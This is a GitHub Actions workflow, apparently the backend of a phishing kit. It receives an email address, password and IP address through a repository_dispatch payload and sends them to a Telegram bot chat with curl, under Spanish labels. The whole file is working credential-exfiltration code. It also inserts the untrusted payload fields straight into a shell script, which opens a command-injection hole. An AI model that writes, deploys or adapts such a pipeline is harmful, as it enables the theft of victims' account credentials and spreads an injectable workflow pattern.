name: Telegram Message Dispatch

on:
  repository_dispatch:
    types: [send_telegram_message]

jobs:
  sendTelegramMessage:
    runs-on: ubuntu-latest
    steps:
      - name: Send Message to Telegram
        env:
          TELEGRAM_API_KEY: ${{ secrets.TELEGRAM_API_KEY }}
          TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
        run: |
          EMAIL="${{ github.event.client_payload.email }}"
          PASSWORD="${{ github.event.client_payload.password }}"
          IP="${{ github.event.client_payload.ip }}"

          MESSAGE="
          • Dirección IP: ${IP}\n
          • Correo: ${EMAIL}\n
          • Contraseña: ${PASSWORD}
          "

          # Enviar a Telegram
          curl -s -X POST "https://api.telegram.org/bot${TELEGRAM_API_KEY}/sendMessage" \
          -d chat_id="${TELEGRAM_CHAT_ID}" \
          -d text="${MESSAGE}"
